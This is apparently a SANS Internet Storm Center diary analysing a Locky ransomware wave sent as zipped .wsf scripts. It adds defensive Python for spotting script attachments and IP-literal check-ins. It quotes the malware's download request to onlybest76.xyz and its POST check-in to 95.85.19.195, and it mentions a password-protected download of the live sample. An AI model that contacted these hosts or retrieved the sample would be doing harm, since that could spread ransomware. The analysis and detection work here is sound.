Pretty much all the Locky variants I have looked at over the last couple of days arrived as zipped JavaScript files. Today, I got something slightly different. While the e-mail looked the same overall, the file was a zipped Windows Script File (.wsf). Overall, this isn't all that different. Windows Script is essentially JavaScript. The only difference is the
Today's subject for the e-mail was "Transaction details". Once the user runs the script by double-clicking the file, it will download the actual crypto ransomware.
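Since the only thing that changed in this wave is the script type inside the archive, an attachment filter that keys on ".js" alone would miss it. The following is an added example (editor's code, not from the diary or from any mail gateway product) that lists the members of a zip attachment, without extracting it, whose final extension is one Windows Script Host or mshta will execute on double-click. The extension set is an assumption that goes beyond the two types named in the diary, and the archives built at the bottom are constructed test data with placeholder content, not the real sample.

```python
import io
import zipfile
from pathlib import PurePosixPath

# Extensions that Windows Script Host (or mshta) runs on double-click.
# Assumption: this list is the editor's, wider than the .js/.wsf pair in the
# diary; extend it to match your own gateway policy.
SCRIPT_EXTENSIONS = {".js", ".jse", ".wsf", ".wsh", ".vbs", ".vbe", ".hta"}


def script_members(zip_bytes: bytes) -> list[str]:
    """Return the names of archive members that would run as a script.

    Only the final extension is checked, so a double-extension lure such as
    'Transaction details.pdf.wsf' is still caught. Names come from the zip
    central directory, so nothing is extracted or executed.
    """
    found = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            if PurePosixPath(info.filename).suffix.lower() in SCRIPT_EXTENSIONS:
                found.append(info.filename)
    return found


def build_sample_zip(members: dict[str, bytes]) -> bytes:
    """Build an in-memory zip from a {name: content} mapping (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed samples: placeholder bodies only, not the diary's malware.
LURE = build_sample_zip({
    "Transaction details.wsf": b"<job><script language='JScript'>/* placeholder */</script></job>",
})
CLEAN = build_sample_zip({"report.pdf": b"%PDF-1.4 placeholder"})

if __name__ == "__main__":
    print(script_members(LURE))   # ['Transaction details.wsf']
    print(script_members(CLEAN))  # []
```

The check deliberately reads the central directory rather than member contents, so it is cheap enough to run on every inbound archive; pairing it with a rule that also unpacks nested zips would close the obvious gap of a script hidden one layer down.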
GET /2tn0o HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
.NET CLR 3.5.30729)
Host: onlybest76.xyz
Connection: Keep-Alive
Just like earlier versions, it then registers the infected system with a website that is only identified by its IP address, so you will not see a DNS lookup for it:
POST /data/info.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://95.85.19.195/data/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
.NET CLR 3.5.30729)
Host: 95.85.19.195
Content-Length: 942
Connection: Keep-Alive
[post data omitted]
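The check-in above is worth alerting on precisely because of what is missing: a POST whose Host header is a bare IP address never produces a DNS query, so name-based blocklists and passive DNS never see it. The following is an added example (editor's code, not from the diary) that parses raw HTTP request heads as a proxy or IDS might hand them over and flags any whose Host header is an IP literal, with or without a port, IPv4 or bracketed IPv6. The sample requests are reconstructed from the diary's two captures with the User-Agent header left out, since the capture on the page does not preserve it, plus one benign request for contrast.

```python
import ipaddress
from typing import NamedTuple


class Flagged(NamedTuple):
    method: str
    path: str
    host: str
    reason: str


def parse_request(raw: str) -> tuple[str, str, dict[str, str]]:
    """Split a raw HTTP/1.x request head into (method, path, lower-cased headers)."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split(maxsplit=2)
    headers: dict[str, str] = {}
    for line in lines[1:]:
        if not line.strip():          # blank line ends the head; body follows
            break
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return method, path, headers


def host_is_ip_literal(host: str) -> bool:
    """True when the Host header is a bare IPv4/IPv6 address, optionally with :port."""
    h = host.strip()
    if h.startswith("["):             # [v6]:port
        h = h[1:h.find("]")]
    elif h.count(":") == 1:           # v4:port (a bare v6 has more colons)
        h = h.split(":")[0]
    try:
        ipaddress.ip_address(h)
        return True
    except ValueError:
        return False


def flag_requests(raw_requests: list[str]) -> list[Flagged]:
    """Return the requests whose Host header is an IP literal (no DNS lookup precedes them)."""
    flagged = []
    for raw in raw_requests:
        method, path, headers = parse_request(raw)
        host = headers.get("host", "")
        if host_is_ip_literal(host):
            flagged.append(Flagged(method, path, host, "Host header is an IP literal; no DNS lookup will precede this request"))
    return flagged


# Constructed sample: the two diary captures (User-Agent omitted) and one benign request.
SAMPLE_REQUESTS = [
    "GET /2tn0o HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-us\r\nAccept-Encoding: gzip, deflate\r\n"
    "Host: onlybest76.xyz\r\nConnection: Keep-Alive\r\n\r\n",
    "POST /data/info.php HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-us\r\nReferer: http://95.85.19.195/data/\r\n"
    "x-requested-with: XMLHttpRequest\r\nContent-Type: application/x-www-form-urlencoded\r\n"
    "Accept-Encoding: gzip, deflate\r\nCache-Control: no-cache\r\nHost: 95.85.19.195\r\n"
    "Content-Length: 942\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nConnection: Keep-Alive\r\n\r\n",
]

if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_REQUESTS):
        print(f"{hit.method} {hit.host}{hit.path}: {hit.reason}")
```

On its own an IP-literal Host is a heuristic, not a verdict; plenty of update checks and internal tools talk to addresses directly. It becomes much more interesting when the client process is wscript.exe or cscript.exe, or when it follows a download from a freshly registered domain a minute earlier, as in the pair of requests above.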
Anti-Malware proves its usual value by doing probably slightly better than a blind chicken in protecting you from this malware. You can download a file with the packet capture, mail server logs, and the malware sample here (password: blind chicken).
Between 9am and 1:30pm UTC, I received 1425 e-mails that match this pattern.
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.